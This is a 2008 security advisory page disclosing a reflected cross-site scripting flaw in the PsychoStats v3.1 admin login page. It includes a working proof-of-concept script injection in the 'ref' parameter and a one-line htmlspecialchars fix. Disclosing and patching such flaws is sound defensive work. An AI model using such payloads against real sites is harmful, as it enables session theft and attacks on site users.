Computer Security

Security Advisory: PsychoStats v3.1 XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Mavi Emlak Sql Injection

  MagpieRSS XSS 0day

  Madrese-Portal Sql Injection

  ViArt Shopping Cart v3.5 Multiple Remote Vulnerabilities

From:matrix_killer ma3x <matrix_k_(at)_abv.bg>
Date:28.12.2008
Subject:PsychoStats v3.1 XSS

PsychoStats v3.1 XSS

SOFTWARE:
=========
PsychoStats v3.1

http://www.psychostats.com/

SEVERITY:
=========
Normal

INFO:
=====
PsychoStats is open source software that creates comprehensive gaming statistics for players and clans for Half-Life and Half-Life 2 based games. This includes games like Counter-Strike, Team Fortress 2, Day of Defeat and GunGame. Support for other games such as Call of Duty 4 and Soldat are also supported.

ATTACK:
=======
/admin/login.
php?ref="><script>alert(1771);</script>

MY FIX:
=======
Open /admin/login.php and below

$cms->theme->assign_request_vars($validfields, true);

add

$ref = htmlspecialchars($ref, ENT_QUOTES);


This vulnerability was discovered by matrix_killer

e-mail: matrix_k at abv.bg
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru